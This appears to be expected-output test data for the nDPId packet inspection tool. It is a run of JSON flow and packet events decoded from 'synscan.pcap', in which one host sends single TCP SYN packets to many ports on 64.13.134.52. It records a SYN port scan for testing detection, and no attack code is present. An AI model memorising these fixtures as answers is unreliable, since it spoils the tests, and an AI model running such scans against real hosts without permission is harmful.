-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyx4AACUGWFSsEAAIQA2GNIzTAgHdU4MZAAAAAGACCAAuiwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsagcAADMGq2usEAAIQA2GNIzTS1PdU4MZAAAAAGACEADdOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsEW4AAC0GCgWsEAAIQA2GNIzTBGbdU4MZAAAAAGACCAAsJgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAscDEAADoGnkGsEAAIQA2GNIzTI\/fdU4MZAAAAAGACDAAIlQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsJJwAADMG8NasEAAIQA2GNIzT4uDdU4MZAAAAAGACEABFqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1sAACUG7BesEAAIQA2GNIzTF0ndU4MZAAAAAGACCAAZQwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsFcMAACoGCLCsEAAIQA2GNIzT3aHdU4MZAAAAAGACDABO6gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAshNgAAC4GlZqsEAAIQA2GNIzTGabdU4MZAAAAAGACDAAS5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTIcAADAGy+usEAAIQA2GNIzTBDXdU4MZAAAAAGACBAAwVwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsBBMAADAGFGCsEAAIQA2GNIzTgATdU4MZAAAAAGACBAC0hwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDhkAACkGEVqsEAAIQA2GNIzTBB\/dU4MZAAAAAGACCAAsbQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsrPEAADMGaIGsEAAIQA2GNIzTAFjdU4MZAAAAAGACEAAoNAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs5rAAADcGKsKsEAAIQA2GNIzTBAvdU4MZAAAAAGACEAAkgQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AAC0GxlOsEAAIQA2GNIzTTiDdU4MZAAAAAGACCADiawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs7JwAACgGM9asEAAIQA2GNIzTCI\/dU4MZAAAAAGACBAAr\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVPkAACcGzHmsEAAIQA2GNIzTBHndU4MZAAAAAGACEAAkEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsGHUAACwGA\/6sEAAIQA2GNIzTDNPdU4MZAAAAAGACBAAnuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsE9wAADUG\/5asEAAIQA2GNIzTBUjdU4MZAAAAAGACCAArRAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsnvwAACgGgXasEAAIQA2GNIzTAh3dU4MZAAAAAGACBAAybwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACoGKpusEAAIQA2GNIzT387dU4MZAAAAAGACDABMvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAs1hEAADoGOGGsEAAIQA2GNIzTBQfdU4MZAAAAAGACDAAnhQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEYAADMGdSysEAAIQA2GNIzTABTdU4MZAAAAAGACEAAoeAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060598,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_packet_id":1,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060598,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSsAACcG5EesEAAIQA2GNIzTPvHdU4MZAAAAAGACEADpmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs6VAAADkGJiKsEAAIQA2GNIzTCf3dU4MZAAAAAGACCAAmjwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAspgEAADUGbXGsEAAIQA2GNIzTDJXdU4MZAAAAAGACCAAj9wAAAgQFtA=="} 